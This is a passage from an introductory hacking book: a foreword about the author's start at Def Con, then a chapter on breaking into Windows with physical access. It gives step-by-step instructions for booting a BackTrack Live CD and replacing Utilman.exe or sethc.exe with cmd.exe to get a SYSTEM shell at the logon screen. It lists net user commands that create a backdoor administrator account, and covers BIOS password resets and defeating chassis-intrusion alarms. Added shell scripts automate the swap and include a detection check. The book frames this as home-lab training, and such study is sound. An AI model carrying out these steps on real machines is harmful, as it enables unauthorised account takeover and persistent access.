Foreword


Over the years I've found that people come to computer security from very different technical 
backgrounds. Some were programmers, some were network administrators, system administra- 
tors, or database administrators; they worked at an ISP, they came from law enforcement; some 
went to college as computer science majors, some didn’t, and some were even still in high school. 
Some came to the field because they just loved hacking; they could tell you about their first pro- 
gramming language at age 14, and the first time they exploited a vulnerable system when they 
were 16. Some were IT professionals who heard that computer security was where the money 
was—and they were right. 


How It All Started for Me 


I became interested in network security after attending a security conference called Def Con
(www.defcon.org). It was a great experience and I learned a lot in those 3 days. Soon after Def Con 
I purchased some security books...OK...let me tell the real story. 

I was working as a help desk technician at the time. I had just passed my A+, Network+, 
MCSE, and CCNA certifications. Although I had no real experience outside of explaining to 
people how to right click all day while working on the help desk and the certification exams I had 
recently passed, I really thought I was pretty sharp when it came to computers. My information 
assurance manager asked me if I was going to Def Con. I had never heard of Def Con, but when 
I looked it up on the Web I was really excited about the idea of going to a hacker conference. It 
sounded cool. 

Walking around the hotel where it was held back then was interesting. There was really loud 
techno music everywhere I went and copious amounts of alcohol. Hackers had turned the pool 
purple, poured cement in several toilets, hacked the ATM machines, and paid strippers to run 
through the crowds naked with clear plastic wrap around their bodies. 

I was completely lost when I attended the presentations given by the Def Con speakers. I had 
absolutely no idea what anyone was talking about. I had heard of Linux, but had no idea of what 
it was. I had no idea what OpenBSD was. I found a 17-year-old kid who didn't seem to mind 
explaining to me what all of this stuff was. He patiently answered my n00b questions (What's a 
port scan? What's a buffer overflow? What is Linux?) He was a participant in the hacking competi- 
tion that year, and he took me over to his team’s table. I sat there in amazement—I had absolutely 
no idea what was going on, but I was drawn to it somehow. No one was using Windows, no one 
was using a graphical user interface (GUI); everyone was writing code right there on the fly in the 
middle of the competition. Although I didn't know what was going on, I somehow knew I wanted
to be one of these people. I was thoroughly embarrassed because I flat out couldn't play. With all 
of the certifications that I had, I was absolutely clueless about hacking. 

At one point there was a guy who wrote a script that changed the ports that attacking teams saw
as open every 6 seconds. I said to him, “Wow that should buy you guys some time”; he said, “No, 
they figure this out pretty quick.” I sat back in amazement—just speechless. I didn't know what 
to say to that. This was just one of the many things I saw these guys do that I had absolutely no 
idea how to do. I didn't even know where to go to look this stuff up. I mean come on, what do you 
google to learn how to do something like that? 

How are these guys doing this stuff without books, or even without Internet access to look this 
stuff up? I soon realized that they had heard I had all of those certifications and let me sit there 
and watch them hack just to embarrass me. Most people with a lot of computer certifications, as 
they call them, are absolutely clueless when it comes to security, and in my case, they were right. 
It didn't take me long to put my hurt pride aside. I started buying everyone pizza and drinks so 
they would let me just sit and watch. As I said, I was drawn to this stuff for some reason. I had no 
idea what they were doing, but I knew this is what I wanted to do. After the competition was over 
I started asking the guys who were on the team how I could learn to do what they were doing. 
They told me to stop using Windows and switch to Linux or BSD, learn to program, then build a
network of several different operating systems and hack them. 


It's Time for a Change 


When I got home from Def Con I bought several books on Linux, programming, and hacking. 
I rebuilt my home network with installations of Red Hat Linux and FreeBSD without GUIs. I got 
rid of Windows, and started trying to learn how to program in C. I joined a bunch of security 
mailing lists, and I just flat out immersed myself in this stuff. 

Fast forward to today nearly 10 years later. I'm a security consultant and trainer. Now I teach 
almost every day. Sometimes I miss those early days of learning to hack. The security field is very 
different now—it’s grown exponentially, and gone in so many different directions. Even though 
there are many books, tutorials, conferences, and courses, I think it’s actually harder to learn now 
because the field is so big that a lot of beginners have no idea where to start. 

Def Con gave me the kick-start I needed; it gave me direction because I got to see very skilled 
people hack into really complex systems with intense network monitoring by other skilled people 
trying to stop them. That's why I think this book is a good idea. This book won't make you a 
master hacker, but that is not its goal. The goal is to shed some light on how hackers do what they
do, and point beginners in the right direction so they can learn what we do. I think Jesse is a great 
guy and phenomenal teacher, and I hope this book does for you what that Def Con experience 
did for me. 


Joe McCray 
Strategic Security 
Baltimore, Maryland 
Chapter 1
Hacking Windows OS 


Introduction 


The word hacker has both positive and negative connotations depending on who you talk to and 
in what context the person is using the word. There are also many levels of hackers, from script 
kiddies to elite hackers. Some countries actively engage in the act of attacking the computer sys- 
tems of other countries; their purpose is to steal intellectual property and government secrets. This 
brings us to another point—hackers are usually divided into three categories: white hat, gray hat, 
and black hat. The white hat hackers use their skills for good, while black hat hackers often do 
“bad things.” The gray hat is somewhere in the middle. I do not encourage people to engage in 
illegal activity under any circumstances. On the other hand, sometimes testing a proof of concept 
in a virtual environment is necessary to “see how the other side operates.” Learning how the bad 
guys do what they do will help us better understand security. 

Like many other people in the industry, I have decided to use my skills to earn an honest liv- 
ing. However, even if you are an honest person, you can have fun doing some hacking as long as 
you are not engaging in illegal activity. My recommendation is for you to set up a test lab at home 
where you can practice these concepts and skills (see Figure 1.1). You can then use these skills
when you have the legal and written permission of the person or organization you are assisting. In
summary, hacking is a fun hobby that can turn into a lucrative career as long as you stay on the
good side of the law.

Figure 1.1 An example home test lab.


Physical Access 


Many people within the computer industry have the opinion that security does not count when 
an attacker has physical access to your computer. I strongly disagree with that opinion; security 
always counts especially when an attacker is able to get physical access to your box. It does not 
have to be "game over" just because an attacker gets physical access to your machines. There are 
measures you can take, such as disk encryption, to secure your computers from physical attack. 
This chapter will discuss what measures can be taken to secure a Microsoft Windows operating 
system and how vulnerable these systems can be when proper precautions are not taken. 

The majority of people who approach a computer at a Windows logon screen are halted in
their tracks. The average individual figures that without the username and password, there is no
chance of getting into the system. A skilled hacker with physical access to a machine that will boot
from removable media and whose disk is not encrypted should be able to break into a Windows
operating system in less than 5 minutes. When a hacker sees this logon screen, they know there
are several tools they can use to easily get into the system. This chapter will discuss several ways
to get into a Windows operating system without having the username or the password.


[Screenshot: classic Windows Professional logon screen, "Press Ctrl-Alt-Delete to begin. Requiring
this key combination at startup helps keep your computer secure."]

At the Windows logon screen, you are "required" to press Control-Alt-Delete to log on to the
system. If you are at the Welcome screen, you just need to click on the user's name and then type in
the password (if one is required). Average users believe that Control-Alt-Delete is the only key
sequence that can be used at this screen. Hackers think differently; they know that hitting Shift five
times will invoke Sticky Keys, and hitting the Windows key and the U key will invoke the Utility
Manager.
[Screenshot: the Utility Manager (Magnifier, Narrator, On-Screen Keyboard) and the StickyKeys
dialog, both opened at the Welcome to Windows logon screen before any user has logged on.]

These key sequences work in Windows 2000, XP, 2003, Vista, 2008, and Windows 7. Sethc.exe
and Utilman.exe are the files associated with these Windows programs that can be launched
prior to logon. The Windows operating system can be easily hacked by locating these files in
%SYSTEMROOT%\system32 and replacing them with other known good Windows files like
cmd.exe or explorer.exe. This chapter will guide you on how to use a Live CD to perform these
steps. However, before you embark on hacking Windows you will need to know how to burn an
ISO, or disk image file.


Live CDs 


There are a large variety of Live CDs that can be utilized to assist you in your quest for Windows 
domination. A Live CD is a special utility that can run an entire operating system from the CD, 
and allow the user to access and manipulate files on the hard drive. The website http://www
.livecdlist.com provides a good list of many popular Live CDs and links to download the ISO files.


[Screenshot: The LiveCD List (livecdlist.com), rated entries including Slax, Ubuntu, Damn Small
Linux, Puppy Linux, BackTrack, Knoppix, SystemRescueCD, Gentoo, PCLinuxOS, Suse Linux,
GParted LiveCD, Feather Linux, Windows PE, Elive, and Ultimate Boot CD, each tagged by purpose
(Desktop, OS installation, Security, Rescue, System Administration, Diagnostics).]
Live CDs are extremely useful tools that can be utilized by individuals with good and bad
intentions. A Live CD will allow network administrators to run Linux on their system without
installing it or changing any of their system's configurations. Law enforcement can use Live CDs
like HELIX or KNOPPIX to acquire a forensically sound copy of a hard drive. Pentesters can use
a distribution like BackTrack to scan networks and computers. And, any Live CD with a browser
can be utilized by individuals who want to surf the net without leaving any artifacts on their
hard drive.


Just Burned My First ISO 


To complete the exercises in this book, I recommend that you download the BackTrack 4 DVD. 
BackTrack is one of the most popular Live CD distributions available, and it has many of the 
tools needed to perform the exercises in this book. The DVD was compiled by Mati Aharoni, 
who provides several training courses on how to use the tools of BackTrack. The training site for 
BackTrack is http://offensive-security.com, and the download site for the ISO file is http://www 
.backtrack-linux.org/. Paste this link in your browser: http://www.backtrack-linux.org/downloads/. 
Then, click the download link to download the BackTrack 4 Beta DVD. BackTrack 4 Beta and 
BackTrack 3 are ideal for performing these exercises because they automount drives. 


[Screenshot: the BackTrack Linux downloads page (http://www.backtrack-linux.org/downloads/)
in Internet Explorer, listing the BackTrack 4 Beta Release ISO image and the BackTrack 4 Beta
Release VMware image (bt4-beta-vm-6.5.1.rar, 1 GB), each with a Download link and an MD5 value.]


Notice that there is an MD5 value to the left of the download link. This value will help us
ensure that the ISO file was not corrupted or altered in transit. Hash values such as MD5 will be
discussed in more detail in Chapter 3. Just to be sure your file was not tampered with during the
download process, download a hashing tool for Windows, such as md5deep or the MD5Win32
shell extension (install MD5Win32.msi from http://pank.org/ftp/windows/). Navigate to the
location on your hard drive where you downloaded bt4-beta.iso. Right click on the ISO and select
hash file. The hash of the bt4-beta file should match the hash listed on the website. MD5 is a
128-bit hash, so the chance that two different files share a value by accident is about 1 in 2^128.
Keep two caveats in mind, though: MD5 collisions can be produced deliberately, so a matching
MD5 proves only that the download was not corrupted or casually substituted, and a hash that
is published on the same page as the download offers no protection against someone who controls
that page or the mirror. Where the project publishes a SHA-256 value or a signature, check that
instead.

[Screenshot: MD5Win32 hash dialog for the downloaded ISO, Hash: 7d1eb71474875363735fee1b8a17c1d8]
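The same check, scripted so it can be repeated for every image you download and run from the
BackTrack shell or any Linux system that has md5sum and sha256sum. This is an added example,
not code from the book or from the BackTrack project. The file it builds and the digests it checks are
constructed: the three-byte file "abc" and its standard MD5 and SHA-256 test-vector values stand in
for the ISO and the value copied from the download page.

```sh
#!/bin/sh
# Added example (not from the book): verify a downloaded image against a
# published digest before burning it. The book's check is MD5; the same
# function accepts sha256 because that is the value to ask for when one
# is published.

# verify_digest FILE ALGO EXPECTED
#   Computes the ALGO (md5 or sha256) digest of FILE and compares it,
#   case-insensitively, with EXPECTED. Returns 0 on a match, 1 on a
#   mismatch, 2 for an unknown algorithm. Messages go to stderr so the
#   function can be used inside other scripts.
verify_digest() {
    file=$1; algo=$2
    expected=$(printf '%s' "$3" | tr 'A-F' 'a-f')
    case "$algo" in
        md5)    actual=$(md5sum "$file" | cut -d' ' -f1) ;;
        sha256) actual=$(sha256sum "$file" | cut -d' ' -f1) ;;
        *)      echo "verify_digest: unsupported algorithm '$algo'" >&2; return 2 ;;
    esac
    if [ "$actual" = "$expected" ]; then
        echo "$file: $algo OK" >&2
        return 0
    fi
    echo "$file: $algo MISMATCH (expected $expected, got $actual)" >&2
    return 1
}

# make_sample_image DIR
#   Writes a constructed stand-in for the ISO (the bytes "abc", no newline)
#   into DIR and prints its path. Its digests are the standard test vectors:
#     md5    900150983cd24fb0d6963f7d28e17f72
#     sha256 ba7816bf8f01cfea414140de5dae2223b00361a396177a9cb410ff61f20015ad
make_sample_image() {
    path="$1/sample-image.iso"
    printf 'abc' > "$path"
    printf '%s\n' "$path"
}

# Usage against the real download:
#   verify_digest bt4-beta.iso md5 <value copied from the download page>
# Run this file with --demo to see a match, a second algorithm, and a mismatch.
if [ "${1-}" = "--demo" ]; then
    dir=$(mktemp -d)
    img=$(make_sample_image "$dir")
    verify_digest "$img" md5 900150983cd24fb0d6963f7d28e17f72
    verify_digest "$img" sha256 ba7816bf8f01cfea414140de5dae2223b00361a396177a9cb410ff61f20015ad
    verify_digest "$img" md5 00000000000000000000000000000000 \
        || echo "mismatch detected, do not burn this image" >&2
    rm -rf "$dir"
fi
```

The comparison lower-cases the expected value because sites print digests in either case, and the
function returns a distinct code for an unknown algorithm so a typo in a script does not read as a
successful check.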


Once you have downloaded the ISO file, you will need some type of burning software. Nero
Burning ROM is one of the best burning suites available. However, it is not a free product. (Nero
does offer a free trial version if you go to their website at http://www.nero.com.) There are also
many free burning programs that work quite well. ImgBurn is a graphical user interface (GUI)
application that allows users to burn or create ISO files. It can be downloaded from http://www
.imgburn.com. The five steps for burning the BackTrack 4 ISO are as follows:

1. Download the bt4-beta.iso file from http://www.backtrack-linux.org/downloads/.
2. Download and install the ImgBurn program from http://www.imgburn.com/.
3. Open the ImgBurn program and select Write image file to disc.

[Screenshot: ImgBurn main menu, "Write image file to disc" option]

4. Insert a blank DVD into your system.
5. To select the image file source, click the browse button, navigate to the location on your
hard drive where you downloaded the bt4-beta ISO file, and click Open. Click OK. Click
the Write image to disc picture.


[Screenshot: ImgBurn write dialog. Source: D:\bt4-beta.iso (ISO9660 bootable, Joliet, 437,396
sectors, 895,787,008 bytes). Destination: TEAC DV-W28EC, current profile DVD-R, free space
4,706,074,624 bytes, supported write speeds 2x, 4x, 6x, 8x, manufacturer ID RITEKF1. Settings:
Write Speed AUTO (MAX), Copies.]
When the burning process is finished, the media will automatically eject from your system. You
can now use the media as a bootable Live CD/DVD.


Before You Start 


If you are going to use tools to break into someone's operating system, make sure you have the per- 
mission of the computer's owner. Accessing someone's computer system without their permission 
is an unlawful act. Many people who are labeled as "hackers" work in the computer security field; 
turning something you enjoy doing for fun into a full time job is not a bad idea. Many of the jobs 
in the information technology field require a security clearance. There are several levels of security 
clearance; some even require polygraphs. Obtaining a security clearance will require some type 
of background investigation. One of the categories that can exclude you from receiving a security 
clearance is the misuse of information technology systems. This includes the illegal or unauthorized 
entry into an information technology system. So, use your hacker “toolbox” only to break into sys- 
tems that you have been granted permission to access or computers in your home test lab. 

Most computers will boot to a CD or DVD without making any modifications to the BIOS.
If a computer will not boot to the BackTrack DVD, you may need to make modifications to your
system's BIOS. On most modern computers, if you press the boot menu key (F8 on many systems;
F12 or Esc on others) as soon as you turn the computer on, you will be provided with a boot option
menu. From this menu, choose the CD/DVD drive. If this does not provide you with a boot option
menu, or you want to permanently change the boot order of the devices in your system, you will
need to access the computer's BIOS. The BIOS setup screen is accessed when a computer is first
turned on by hitting a key or a series of keys (usually F1, F2, or Delete). When first turned on, the
computer usually indicates what the key sequence is to enter the BIOS. If you encounter a machine
where you are unable to get into the BIOS, do some googling with the name of the computer
manufacturer to find the necessary sequence for the machine. A lot of valuable information can be
gained or discovered by using the search engine Google. For example, if you were looking to find
out how to "enter the BIOS on a Dell PowerEdge," type that into Google, without quotes. Sometimes,
the answer can be located more quickly by finding a forum instead of going to the manufacturer's
website.


In some situations, the computer's BIOS is password protected. There are several ways that
hackers, or computer technicians for that matter, can reset the BIOS password. Sometimes there
is a small jumper on the motherboard located close to the CMOS battery, as seen in Figure 1.2.
If the jumper is pulled (or moved to its "clear" position) the password will be reset. If a jumper is
not present, the CMOS battery has to be pulled from the machine. The amount of time that the
battery must be removed from the system can vary.

Figure 1.2 CMOS jumper on the motherboard to reset the BIOS password.


There is a disadvantage to a hacker removing a jumper or taking the battery out to get into 
the BIOS; if a password has been changed, the person who set the password will know that the 
BIOS has been reset. For example, a colleague of mine changed the settings on his computer that 
required users to enter a BIOS password in order to start the system. It seemed he did not want his 
wife or kids using his high-end system. I explained to him that if the CMOS battery or jumper 
was removed, they would be able to get into his system. He agreed that methods exist to reset 
the BIOS password; however, if his password was reset he would know his system was accessed. 
A more “stealthy” way for a hacker to enter the BIOS is to use a default or “backdoor” password. 
There are lists of BIOS passwords that can be retrieved from the Internet using Google. One of the 
most effective ways to keep people from resetting BIOS passwords is to lock the computer case. 
While most computer case locks can be picked fairly easily, this technique can be used as a deter- 
rent to prevent someone from changing BIOS settings like boot order. However, keep in mind 
that even if the case is locked, if someone has a backdoor or default password, locking the system 
will not prevent them from accessing the system. A simple lock on the computer will not thwart 
a determined attacker. 

After opening the case of some newer computers, you may receive a "Chassis Intrusion 
Detected" message when you put the cover back on and power on the machine. Chassis intrusion 
messages are an annoying feature included in some newer BIOS versions. In most cases, the chassis 
intrusion cable is plugged into a jumper on the motherboard. If you unplug the cable from the 
jumper on the motherboard and place a new jumper (you can always find extras on old mother- 
boards, cards, or hard drives), the alarm should not go off any more. Sometimes, several reboots 
will be necessary. 

After entering the BIOS, a user can navigate around by using the arrow keys (not by using
the mouse). Manufacturers may have opted for use of the keyboard only in the BIOS screen
to keep novice users from changing important BIOS settings. One incorrect BIOS setting
could result in the computer not booting. The layout of the BIOS utility will vary depending
on the manufacturer. Most BIOS screens have a setting referred to as Boot Device Priority,
Boot, Startup Sequence, or a similar type of setting. The way to change the boot order will also
vary depending on the BIOS manufacturer. On the BIOS of some systems, hitting Enter
after selecting the first boot device will pull up a menu that allows you to select from a list
of choices that can become the new first boot device. Other BIOS setup screens require you
to use the up and down arrows until you get all of the devices in the order you desire. If the
hacker is booting to a CD or DVD, the DVD drive should be the first device in the boot
order.


[Screenshot: BIOS Setup Utility, 1st Boot Device set to [CDROM]]


On modern computers, the USB thumb drive is also a boot choice, and this option is quickly
becoming popular. Once the BIOS settings have been changed, the "Save Changes and Exit"
selection needs to be located from within the BIOS menu. This task can usually be accomplished
by hitting the F10 key on most systems. Once the BIOS has been modified to boot to the proper
device, you can boot to your BackTrack DVD or other Live CD.


Utility Manager 


The Utility Manager was designed to help people with disabilities. For this next exercise, your 
“victim” computer should be running any of the following Microsoft Windows operating sys- 
tems: Windows Vista, Windows 2008 Server, or Windows 7. This attack can even be launched 
against systems utilizing Smart Card and fingerprint readers. If the computer is off, turn it on 
and insert the BackTrack DVD immediately. If the computer is presently at the logon screen, 
insert the DVD and click the shutdown button. If the shutdown selection is not available, you 
will need to put the DVD in the drive and reset the computer. If the computer does not have 
a reset button, just power it off and power it back on again. 
[Screenshot: Windows 7 power menu: Sleep, Hibernate, Shut down]


Use the following steps to break into the Windows 7 operating system: 


1. Select BT4 Beta Console at the Boot menu.

[Screenshot: BackTrack 4 Beta boot menu with the entries BT4 Beta Console, BT4 Beta Console
no FB, BT4 Beta - MSRAMDUMP, and Memtest utility]

2. At the BackTrack 4 Beta menu, log in as root with the password of toor. Then type startx to
launch the GUI.

[Screenshot: BackTrack 4 Beta console boot messages (setting kernel variables, activating swap,
starting crypto disks, checking file systems with fsck 1.41.3, mounting local filesystems, starting
ACPI, the system log daemon and HAL), followed by the "bt login: root" prompt and "# startx"]


3. Launch the terminal by clicking the black icon to the left of the Firefox icon.

[Screenshot: KDE panel with the Konsole terminal icon beside the Firefox icon]
4. View the Windows 7 partitions by typing the command fdisk -l. Typically, you will see one
NTFS partition for Windows Vista operating systems and two partitions for Windows 7 operating
systems (the Windows 7 installer creates a small "System Reserved" boot partition ahead of the
Windows partition). Even though the device is listed as /dev/sda2, it is mounted on the system as
/mnt/sda2. Note: For Vista and XP, it will be /dev/sda1.

Note: If the computer has IDE (older) drives as opposed to SATA drives, Linux displays
those disks as hda instead of sda. Replace sda with hda in Steps 5, 6, and 10.
5. Look for the Windows directory by typing ls /mnt/sda2.
[Screenshot: Konsole, output of ls /mnt/sda2 showing the Windows directory]


Note: If you do not see the Windows directory, try ls /mnt/sdal, ls /mnt/sda3, and so on, 
until you see the directory. Some computer manufactures add additional partitions for utili- 
ties and restoration purposes. 

6. Change to the Windows directory by typing cd /mnt/sda2/Windows. 
Note: Linux is case sensitive, so you need to use the correct case. 

7. The Utilman.exe file is located in the System32 directory. Type the ls command once again
to list the contents of the Windows directory.

[Screenshot: Konsole, ls /mnt/sda2/Windows listing the System32 directory]

8. Go into the System32 directory by typing the command cd System32. Keep in mind once
again that Linux is case sensitive, so you must type the directory as you see it printed on the
screen.

[Screenshot: Konsole, prompt root@bt:/mnt/sda2/Windows/System32]


9. The System32 directory is the primary location for most of the Windows executables. One 
of these executables, Utilman.exe, launches the Utility Manager. Luckily, this application 
can be launched “prior to logon.” During this step Utilman.exe is renamed to Utilman.bak 
in case the correct file needs to be restored. Then a new Utilman.exe is created by copying 
the cmd.exe file and renaming it Utilman.exe. When the user reaches the logon screen and 
they invoke the Utility Manager, a command prompt will launch. Rename Utilman.exe 
Utilman.bak by typing mv Utilman.exe Utilman.bak. Copy the cmd.exe file by typing 
cp cmd.exe Utilman.exe. 


[Screenshot: Konsole, mv Utilman.exe Utilman.bak followed by cp cmd.exe Utilman.exe, run in
/mnt/sda2/Windows/System32]


10. Change back to the root directory by typing cd /root. Next, unmount the partition by 
typing umount /dev/sda2. Note that the command to unmount is umount, not unmount. 
Type eject, remove the DVD and close the tray. 

Note: Eject does not work in VMware. Type reboot to restart your computer to your 
Windows 7 operating system. 


[Screenshot: Konsole, cd /root, umount /dev/sda2, eject, reboot]


11. To invoke the Utility Manager, either press the Windows key and the letter U or hit the blue
Ease of Access button in the bottom left hand corner of the screen. A command prompt
should be displayed. Notice that the title of the command prompt is C:\Windows\system32\
utilman.exe.

[Screenshot: Windows 7 logon screen with a command prompt titled C:\Windows\system32\utilman.exe
open in front of it]
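Steps 4 through 10 above, and the same swap for sethc.exe that the Sticky Keys section later in
this chapter relies on, collected into one script together with the check a defender would run for it.
This is an added example and not the book's own commands: it locates the mounted Windows
partition the way the "try ls /mnt/sda1, /mnt/sda3" note describes, backs up and replaces the
accessibility helper with a copy of cmd.exe, restores it, and flags any helper whose bytes match
cmd.exe or explorer.exe. The directory tree it builds under a temporary directory is a constructed
stand-in for the mounted disk so the script runs offline; on a BackTrack boot you would pass the
real mount points (for example /mnt/sda1 /mnt/sda2) instead, and the file names assume the
capitalisation Windows 7 uses on disk (Utilman.exe, sethc.exe, cmd.exe).

```sh
#!/bin/sh
# Added example (not from the book): the accessibility-binary swap done from
# a Live CD, its reversal, and the check that catches it. The tree built by
# build_sample_tree is a constructed stand-in for /mnt on a BackTrack boot;
# real runs use the mount points that fdisk -l and ls /mnt show.

# Helpers Windows launches before logon: Win+U (Utility Manager), Shift x5 (Sticky Keys).
HELPERS="Utilman.exe sethc.exe"

# find_windows_root MOUNT... : print the first mount point containing
# Windows/System32 (the "try ls /mnt/sda1, /mnt/sda3, ..." step). Returns 1 if none.
find_windows_root() {
    for m in "$@"; do
        if [ -d "$m/Windows/System32" ]; then
            printf '%s\n' "$m"
            return 0
        fi
    done
    return 1
}

# swap_accessibility_binary WINROOT NAME.exe : mv NAME.exe NAME.bak, then
# cp cmd.exe NAME.exe. Refuses to run twice so the backup is never a copy of cmd.exe.
swap_accessibility_binary() {
    sys32="$1/Windows/System32"; exe=$2; bak="${exe%.exe}.bak"
    if [ ! -f "$sys32/$exe" ]; then
        echo "$exe not found in $sys32 (remember Linux is case sensitive)" >&2; return 1
    fi
    if [ -f "$sys32/$bak" ]; then
        echo "$bak already exists; $exe has been swapped before" >&2; return 1
    fi
    mv "$sys32/$exe" "$sys32/$bak" && cp "$sys32/cmd.exe" "$sys32/$exe"
}

# restore_accessibility_binary WINROOT NAME.exe : put the original back.
restore_accessibility_binary() {
    sys32="$1/Windows/System32"; exe=$2; bak="${exe%.exe}.bak"
    [ -f "$sys32/$bak" ] || { echo "no $bak to restore" >&2; return 1; }
    mv "$sys32/$bak" "$sys32/$exe"
}

# check_accessibility_binaries WINROOT : the defender's check. Prints each
# helper whose content is byte-for-byte identical to cmd.exe or explorer.exe
# and returns 1 if any was found, 0 when the tree is clean. This only catches
# the straight copy described in this chapter; a fuller review would also
# verify the signature and version information of each helper.
check_accessibility_binaries() {
    sys32="$1/Windows/System32"; found=0
    for h in $HELPERS; do
        for shell in cmd.exe explorer.exe; do
            if [ -f "$sys32/$h" ] && cmp -s "$sys32/$h" "$sys32/$shell"; then
                printf '%s is a copy of %s\n' "$h" "$shell"
                found=1
            fi
        done
    done
    return $found
}

# build_sample_tree DIR : constructed stand-in for a BackTrack /mnt with a
# recovery partition on sda1 and Windows on sda2. File contents are
# placeholders, not real binaries.
build_sample_tree() {
    mkdir -p "$1/mnt/sda1/Recovery" "$1/mnt/sda2/Windows/System32"
    for f in cmd.exe explorer.exe $HELPERS; do
        printf 'placeholder for %s\n' "$f" > "$1/mnt/sda2/Windows/System32/$f"
    done
}

# Run with --demo: swap Utilman.exe, show the check flagging it, restore it.
if [ "${1-}" = "--demo" ]; then
    tmp=$(mktemp -d); build_sample_tree "$tmp"
    win=$(find_windows_root "$tmp/mnt/sda1" "$tmp/mnt/sda2")
    swap_accessibility_binary "$win" Utilman.exe
    check_accessibility_binaries "$win" || echo "tampering detected" >&2
    restore_accessibility_binary "$win" Utilman.exe
    check_accessibility_binaries "$win" && echo "clean after restore" >&2
    rm -rf "$tmp"
fi
```

The refusal to swap twice matters in practice: running the book's mv and cp a second time would
overwrite Utilman.bak with the cmd.exe copy and leave nothing to restore from. Pass sethc.exe
instead of Utilman.exe to prepare the Sticky Keys variant.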


The six integrity levels in Windows 7 and Vista are listed below in order from highest to lowest:

1. Installer (software installation)
2. System (system processes)
3. High (administrators)
4. Medium (user)
5. Low (Internet Explorer when protected mode is enabled)
6. Untrusted (lowest level)


Even though User Account Control is enabled on the exploited machine, the command prompt
runs as SYSTEM, the second highest level of privilege, and it was obtained without clicking the
Allow button. Once a command prompt has been obtained, havoc can be wreaked on the exploited
system. Some of the tasks that can be accomplished include

— Adding a user
— Enabling and disabling users
— Changing user passwords
— Adding users to the administrators group
— Changing the registry
— Starting and stopping services
— Scheduling services
— Copying, adding, or deleting files and folders
— Modifying date and time stamps
— Starting services that allow users to connect remotely
— Changing port numbers for remote services
— Disabling the firewall

All of these tasks will be discussed throughout the chapters in this book. The net user com- 
mand can be utilized to create, activate, and delete users as well as change their passwords. The 
net localgroup command can be used to add users to the administrators group. The following is 
a list of net commands used to manipulate user accounts on the system from the command line: 


— net user hax0r Pa$$w0rd /add: Adds a user account called hax0r with the password
of Pa$$w0rd.

— net localgroup administrators hax0r /add: Adds the user hax0r to the administrators
group. The name of the group is "administrators" with an s, not administrator.

— net user administrator /active:yes: Activates the administrator account, which is dis-
abled by default on Windows Vista and Windows 7. The administrator account is active
on Windows Server 2008.

— net user administrator Pa$$w0rd: Gives the administrative user account the password
of Pa$$w0rd.

— net user administrator /comment:"You are 0wnd": Gives the administrator account
the comment "You are 0wnd."

— net user guest /active:yes: Activates the guest account, which is disabled by default on
all Windows versions (except 95, 98, and ME, where it does not exist).

— net user guest Pa$$w0rd: Gives the guest user account the password of Pa$$w0rd.

— net localgroup administrators guest /add: Adds the user guest to the administrators
group.


[Screenshot: the utilman.exe command prompt, running from C:\Windows\system32 with its
profile under systemprofile: net user hax0r Pa$$w0rd /add, net localgroup administrators hax0r
/add, net user administrator /active:yes and net user administrator Pa$$w0rd, each answered with
"The command completed successfully."]
13. Most tasks that a user completes using a GUI can also be completed from a command
prompt. Many times, a hacker will not have access to a GUI. In order to be effective, 
the skilled hacker will need to be able to complete most tasks from a command line. If 
the explorer command is invoked at the C:\Windows\system32\utilman.exe prompt, the 
Windows Explorer will be displayed. Notice that SYSTEM is listed as the logged-on user. 


[Screenshot: Start menu opened from the C:\Windows\system32\utilman.exe prompt, with SYSTEM
shown as the logged-on user; taskbar clock 2:46 PM, 5/21/2009]


After opening Windows Explorer, clicking on the Start button and right clicking on Computer opens
the Computer Management console. By clicking the Users folder under Local Users and Groups, the
users that were created and managed at the command line will be displayed. Additional users can
also be created and managed from the Local Users and Groups console.


Sticky Keys 


For this next exercise, your "victim" computer should be running any of the following Microsoft 
Windows operating systems: Windows 2000, XP, 2003, Vista, 2008, or Windows 7. This attack can 
even be launched against systems utilizing Smart Card and fingerprint readers. If the computer is 
off, turn it on. If it is locked at a password protected screen, put the BackTrack DVD in and reset the 
machine. When Shift is pressed five times on almost any machine running any flavor of Windows, 
Sticky Keys is launched. 


[Screenshot: Sticky Keys prompt: “Do you want to turn on Sticky Keys? Sticky Keys lets you use 
the SHIFT, CTRL, ALT, or Windows Logo keys by pressing one key at a time. The keyboard shortcut 
to turn on Sticky Keys is to press the SHIFT key 5 times.” A link reads “Go to the Ease of Access 
Center to disable the keyboard shortcut.”] 


Although it is not the default selection in any version of Windows, Sticky Keys can easily be 
disabled by clicking the “Go to the Ease of Access Center to disable the keyboard shortcut” link 
after hitting Shift five times. (In operating systems prior to Vista, just click the settings tab.) 
Remove the check from the box that states Turn on Sticky Keys and click Apply. After changing 
this setting, Sticky Keys will not launch when Shift is pressed five times. 


[Screenshot: Ease of Access Center, Set up Sticky Keys. The boxes “Turn on Sticky Keys” and 
“Turn on Sticky Keys when SHIFT is pressed five times” are cleared. Still checked: Display a 
warning message when turning a setting on; Make a sound when turning a setting on or off; Turn 
off Sticky Keys when two keys are pressed at once; Play a sound when keys are pressed; Display 
the Sticky Keys icon on the task bar. Buttons: Save, Cancel, Apply.] 


Unless the settings are changed on an individual machine, Sticky Keys is a formidable physical 
attack vector for hackers. In order to utilize this attack vector, perform the following steps on the 
system running Microsoft Windows: 


1. Boot the machine to the BackTrack DVD. 


2. Log on as the user root with the password of toor. Type startx to launch the GUI. 
3. Open a terminal by clicking the button to the left of the Firefox icon. 


4. Type the Linux command fdisk -l to view the partitions on the disk. A single partition 
configuration is common; the Windows system files will most likely reside on the first partition. 




5. Even though the device is listed as /dev/sda1, in this case it is mounted to /mnt/sda1. The 
mount command will verify this. The mount command by itself will work fine; the last line 
will give you the relevant information. You can eliminate the extra information by typing 
mount | grep fuse. 




6. Navigate to the System32 directory by typing cd /mnt/sda1/Windows/System32. 

7. Rename sethc.exe to sethc.bak by typing mv sethc.exe sethc.bak. 

8. Copy cmd.exe and name it sethc.exe by typing cp cmd.exe sethc.exe. 

9. Go back to the root directory by typing cd /. Unmount the partition by typing 
umount /dev/sda1. Eject the CD-ROM and reboot by typing eject & reboot. 




The System32 directory is the location of sethc.exe, the executable file used to launch Sticky 
Keys. This file is replaced with another Windows executable, cmd.exe, which launches the 
command prompt. When the attacker hits Shift five times, the command prompt launches instead. 
In Windows Vista and 2008 Server, the command whoami can be typed to view the privileges 
that have been gained using this attack. In other Windows operating systems, such as Windows 
XP and Windows 7, use the set command to view the username. Regardless of the Windows 
version, the attack obtains SYSTEM privileges. Notice that the command prompt title bar says 
sethc.exe. 
